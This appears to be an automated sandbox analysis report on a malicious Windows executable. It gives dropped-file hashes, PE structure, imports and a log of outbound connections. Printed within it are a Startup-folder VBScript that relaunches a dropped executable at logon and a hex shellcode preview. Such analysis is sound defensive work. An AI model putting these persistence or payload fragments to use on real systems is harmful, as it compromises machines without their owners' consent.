File Type:	ASCII text, with very long lines (29718), with no line terminators
Category:	dropped
Size (bytes):	29718
Entropy (8bit):	3.579534381329983
Encrypted:	false
SSDEEP:	768:FiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbeE+ItIiy4vfF3if6gy8:FiTZ+2QoioGRk6ZklputwjpjBkCiw2R2
MD5:	4F75A7B10B7338B674939F2E64A4F73A
SHA1:	F5DA2453CB0C24182783E638AF61E4D98B072AC9
SHA-256:	7860BD51138552E6A637DB7B9C3998A865CE586F7DD0DCDD0D5643D62699B9BA
SHA-512:	0679F8CBF17E5986B4EAB246B5AEA68C2C80F08EB02F2103675BC2BBD2FB57E6199FCEB89BDF984D379CDD4BF77231B4F62D99EE888CC4F18E4F4F4A7FC5F61D
Malicious:	false
Reputation:	low
Preview:	D9A2E7D5A75A08C7E82E0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000006689857effffff33c966894d80ba

C:\Users\user\AppData\Local\Temp\troopwise

Download File

Process:	C:\Users\user\Desktop\PsBygexGwH.exe
File Type:	MIPSEB MIPS-II ECOFF executable not stripped - version 82.75
Category:	dropped
Size (bytes):	133632
Entropy (8bit):	7.068705738050652
Encrypted:	false
SSDEEP:	3072:kdmkY26vGslIQ+wteQUBDe1uxH5CUkO3ZwS8O64zLhJ0rDW0w654ArA:kgkY9+qBUgkV34O64X/0rD5A
MD5:	AB789573C51720A521954BC2DEEA06FC
SHA1:	AF07C939088FFEB71E7C16A4D7487EE7931E0006
SHA-256:	C70A64AC25B90077931E151724F8566C8D07E6E4888AAD9577FA467ED96A97B8
SHA-512:	0B460881D64A03DC82DF6C0D3D4D0619DABB171B24866D460FA4F1AC3A84F95F8115667093D51F0C65C835802E6418359DAFF81C934E8FEB425CC3934FDC961A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	low
Preview:	.c.6KVAD]ISI..Z8.A81UYRK.T6BJL996HVADYISIR4Z8GA81UYRKXT6BJL9.6HVO[.GS.[.{.F....1;8x$D-->XT.+7/6=s+7.(M)aQ_u...x9Y&/b44<lVADYISI.qZ8.@;16Q..XT6BJL99.HT@OX.SI.5Z8SA81UYRUJV6BjL99.JVAD.ISiR4Z:GA<1UYRKXT2BJL996HV!FYIQIR4Z8GC8q.YR[XT&BJL9)6HFADYISIB4Z8GA81UYRK.E4B.L996hTA.IISIR4Z8GA81UYRKXT6B.N956HVADYISIR4Z8GA81UYRKXT6BJL996HVADYISIR4Z8GA81UYRKXT.BJD996HVADYISIZ.Z8.A81UYRKXT6Bd8\ABHVA`.HSIr4Z8.@81WYRKXT6BJL996HVaDY)};!F98GA.!UYRkZT6PJL9.7HVADYISIR4Z8G.81.w .4;UBJ@996H.CDYKSIR<X8GA81UYRKXT6B.L9{6HVADYISIR4Z8GA81G[RKXT6.JL9;6MV.dXI..R4Y8GA.1U_vkYT.BJL996HVADYISIR4Z8GA81UYRKXT6BJL996HVADYISI.I.7...X&..KXT6BJM;:2N^IDYISIR4ZFGA8wUYR.XT6uJL9.6HV,DYIwIR4$8GAF1UY6KXTDBJLX96H.ADY&SIRZZ8G?81UGPcxT6H`j9;.iVANYc.:p4Z2.@81QqKX^.@JL=J.HVK.ZISM!.Z8M.<1U]!mXT<.OL9=..VB.OOSII[c8GK82.LTKXO.dJN..6H\An.IP.G2Z8\k.1W.[KXP..9Q990`.ADS=ZIR6.2GA<.K[z.XT<hh2+96L}An{7@IR0q8mcF%UYV`X~.<_L9=.H\|c:OISMy4p&E..1U]xi&C6BNg9..6NAD]bScpJC8GE.1.GP.AT6F`J.[6:n]D)J<.R4\..A8;}.RK^T.xJ2.96LT..YIYoxjZ:oK91_YPH%o6BNN=D.HVEn.IQ2l4

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\Desktop\PsBygexGwH.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114376704
Entropy (8bit):	7.999599217476744
Encrypted:	true
SSDEEP:	393216:I3dR6pAWZcZPnwVif1Obttb5MK356rrQ42LEGrzEj5JHfY/q5KQf5NHAB1xLq:IUpAWpM1M356rrQ4LVfYr0HW/G
MD5:	90D7DF3194AF25C7942DCDB56E8902F3
SHA1:	2865B48E868C6CC67B335E82F3EF2864D727F6A3
SHA-256:	496E83A0C5C3A23F63CF1B3EEC90E671E83C1186E9FA64A36429EABC2243367C
SHA-512:	F4E95549954E921498656661C5049DC6ADB7BAFA82D8C198059E95F0F264B0A4DF49BA6CD79E223F043DDA0AFC03650ACE78A3B14AB965B0EFE637CA5CDA719F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f..........".................w.............@.......................................@...@.......@.....................d...\|....@..x.................... ...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...x....@......................@..@.reloc...u... ...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	3.4209455304240626
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcloRKUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNloRKQ1A1z4mA2n
MD5:	D3A871A22DFC23DD6763F6002299B13A
SHA1:	B7934BFD389FE7FBDC08710EDABA4C16D3EED618
SHA-256:	FEA868420602CDAF96C19BE169F6BA44178494DB3B8F6292DCD7B8A8BB194F66
SHA-512:	6166B8A0DED88F7C8F3CC1D92A44A0A112B4CFCBEEB3934005E89B32614C79BB7F7ABDBF8CF84D90D4864C425460673739935562B344AE14FFE1076F5D0F7CA9
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.985470169110912
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PsBygexGwH.exe
File size:	1'130'496 bytes
MD5:	222d05295014f8974d6e358e1507770e
SHA1:	d1475a87d8aad1852eda1ac93ebb0bbbb1f08e0b
SHA256:	f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a
SHA512:	c4c7306b63d8532337a302ae1129d10bea3fe31c5ac38f2d279309960b6c2bbd3b572486778a6d00e75bdcf3ccb92d975ead94f9c5134d712222ee99da3bd096
SSDEEP:	24576:gqDEvCTbMWu7rQYlBQcBiT6rprG8anIpGboB/Gii:gTvC/MTQYxsWR7anCGw+i
TLSH:	F735BF0273C1D062FF9B92334B5AF6515BBC6A260123E61F13981DB9BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6602E50B [Tue Mar 26 15:08:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F3E0D724223h
jmp 00007F3E0D723B2Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F3E0D723D0Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F3E0D723CDAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F3E0D7268CDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F3E0D726918h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F3E0D726901h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x3d478	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x112000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x3d478	0x3d600	63b2868add101ae138f2fa4f40774c6c	False	0.8921803398676171	data	7.809273577814519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x112000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x34740	data			1.0003537384569556
RT_GROUP_ICON	0x110ef8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x110f70	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x110f84	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x110f98	0x14	data	English	Great Britain	1.25
RT_VERSION	0x110fac	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x111088	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2024 13:59:12.632882118 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:12.811760902 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:12.811991930 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:12.812274933 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:12.991117001 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:13.127237082 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:13.175162077 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:13.321785927 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:13.500679016 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:13.508291006 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:13.550195932 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:14.531517982 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:14.531557083 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:14.531619072 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:14.685353041 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:14.685386896 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:14.946806908 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:14.946933031 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:14.985507011 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:14.985537052 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:14.985790968 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:15.034547091 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:15.185969114 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:15.232234001 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:15.320166111 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:15.320307016 CEST	443	49738	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:15.320456982 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:15.584688902 CEST	49738	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:15.666697979 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:15.885596037 CEST	80	49737	158.101.44.242	192.168.2.4
Apr 8, 2024 13:59:15.940800905 CEST	49737	80	192.168.2.4	158.101.44.242
Apr 8, 2024 13:59:16.029479980 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:16.029509068 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:16.029620886 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:16.029942036 CEST	49739	443	192.168.2.4	172.67.177.134
Apr 8, 2024 13:59:16.029953957 CEST	443	49739	172.67.177.134	192.168.2.4
Apr 8, 2024 13:59:16.288114071 CEST	443	49739	172.67.177.134	192.168.2.4
